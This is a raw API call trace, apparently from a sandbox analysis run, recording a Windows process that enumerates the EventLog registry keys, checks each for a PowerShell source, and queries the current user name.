	[0300.941] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.941] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x330) returned 0x0
	[0300.941] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.941] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x334) returned 0x0
	[0300.941] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.941] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x338) returned 0x0
	[0300.942] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.942] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x33c) returned 0x0
	[0300.942] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.942] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x340) returned 0x0
	[0300.942] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x344) returned 0x0
	[0300.942] RegCloseKey (hKey=0x344) returned 0x0
	[0300.942] RegCloseKey (hKey=0x304) returned 0x0
	[0301.278] RegCloseKey (hKey=0x340) returned 0x0
	[0301.286] CoTaskMemAlloc (cb=0x804) returned 0x1b84f080
	[0301.287] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84f080, nSize=0x1cd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd828) returned 0x1
	[0301.288] CoTaskMemFree (pv=0x1b84f080) 
	[0301.289] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.289] GetUserNameW (in: lpBuffer=0x292480, pcbBuffer=0x1cd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd868) returned 1
	[0301.289] CoTaskMemFree (pv=0x292480) 
	[0301.313] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd568 | out: phkResult=0x1cd568*=0x348) returned 0x0
	[0301.313] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd4dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd4dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.313] CoTaskMemFree (pv=0x0) 
	[0301.313] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.313] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.313] CoTaskMemFree (pv=0x292480) 
	[0301.313] CoTaskMemFree (pv=0x0) 
	[0301.313] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.313] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.313] CoTaskMemFree (pv=0x292480) 
	[0301.313] CoTaskMemFree (pv=0x0) 
	[0301.313] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.313] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.314] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.314] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.314] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.314] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.314] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.314] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.314] CoTaskMemFree (pv=0x292480) 
	[0301.314] CoTaskMemFree (pv=0x0) 
	[0301.314] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x34c) returned 0x0
	[0301.315] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.315] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x350) returned 0x0
	[0301.315] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.315] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x354) returned 0x0
	[0301.315] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.315] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x358) returned 0x0
	[0301.315] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.315] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x35c) returned 0x0
	[0301.315] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.315] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x360) returned 0x0
	[0301.315] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.316] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x364) returned 0x0
	[0301.316] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.316] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x368) returned 0x0
	[0301.316] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.316] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x36c) returned 0x0
	[0301.316] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x370) returned 0x0
	[0301.316] RegCloseKey (hKey=0x370) returned 0x0
	[0301.316] RegCloseKey (hKey=0x348) returned 0x0
	[0301.317] RegCloseKey (hKey=0x36c) returned 0x0
	[0301.317] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd568 | out: phkResult=0x1cd568*=0x36c) returned 0x0
	[0301.317] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd4dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd4dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.318] CoTaskMemFree (pv=0x0) 
	[0301.318] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.318] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.318] CoTaskMemFree (pv=0x292480) 
	[0301.319] CoTaskMemFree (pv=0x0) 
	[0301.319] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.319] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.319] CoTaskMemFree (pv=0x292480) 
	[0301.319] CoTaskMemFree (pv=0x0) 
	[0301.319] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.319] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x292480, lpcchName=0x1cd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.319] CoTaskMemFree (pv=0x292480) 
	[0301.319] CoTaskMemFree (pv=0x0) 
	[0301.319] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x348) returned 0x0
	[0301.319] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.319] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x370) returned 0x0
	[0301.319] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.319] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x374) returned 0x0
	[0301.319] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.319] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x378) returned 0x0
	[0301.319] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.320] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x37c) returned 0x0
	[0301.320] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.320] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x380) returned 0x0
	[0301.320] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.320] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x384) returned 0x0
	[0301.320] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.320] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x388) returned 0x0
	[0301.320] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x0) returned 0x2
	[0301.320] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x38c) returned 0x0
	[0301.320] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5c8 | out: phkResult=0x1cd5c8*=0x390) returned 0x0
	[0301.320] RegCloseKey (hKey=0x390) returned 0x0
	[0301.321] RegCloseKey (hKey=0x36c) returned 0x0
	[0301.321] RegCloseKey (hKey=0x38c) returned 0x0
	[0301.321] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd538 | out: phkResult=0x1cd538*=0x38c) returned 0x0
	[0301.322] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd4ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd4ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.322] CoTaskMemFree (pv=0x0) 
	[0301.322] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.322] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.322] CoTaskMemFree (pv=0x292480) 
	[0301.322] CoTaskMemFree (pv=0x0) 
	[0301.322] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.322] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.322] CoTaskMemFree (pv=0x292480) 
	[0301.322] CoTaskMemFree (pv=0x0) 
	[0301.322] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.322] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.322] CoTaskMemFree (pv=0x292480) 
	[0301.322] CoTaskMemFree (pv=0x0) 
	[0301.322] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.322] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.322] CoTaskMemFree (pv=0x292480) 
	[0301.322] CoTaskMemFree (pv=0x0) 
	[0301.322] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.322] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.322] CoTaskMemFree (pv=0x292480) 
	[0301.322] CoTaskMemFree (pv=0x0) 
	[0301.322] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.322] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.323] CoTaskMemFree (pv=0x292480) 
	[0301.323] CoTaskMemFree (pv=0x0) 
	[0301.323] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.323] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.323] CoTaskMemFree (pv=0x292480) 
	[0301.323] CoTaskMemFree (pv=0x0) 
	[0301.323] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.323] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.323] CoTaskMemFree (pv=0x292480) 
	[0301.323] CoTaskMemFree (pv=0x0) 
	[0301.323] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0301.323] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x292480, lpcchName=0x1cd538, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd538, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.323] CoTaskMemFree (pv=0x292480) 
	[0301.323] CoTaskMemFree (pv=0x0) 
	[0301.323] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x36c) returned 0x0
	[0301.323] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.323] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x390) returned 0x0
	[0301.323] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.324] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x394) returned 0x0
	[0301.324] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.324] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x398) returned 0x0
	[0301.324] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x0) returned 0x2
	[0301.324] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd598 | out: phkResult=0x1cd598*=0x39c) returned 0x0
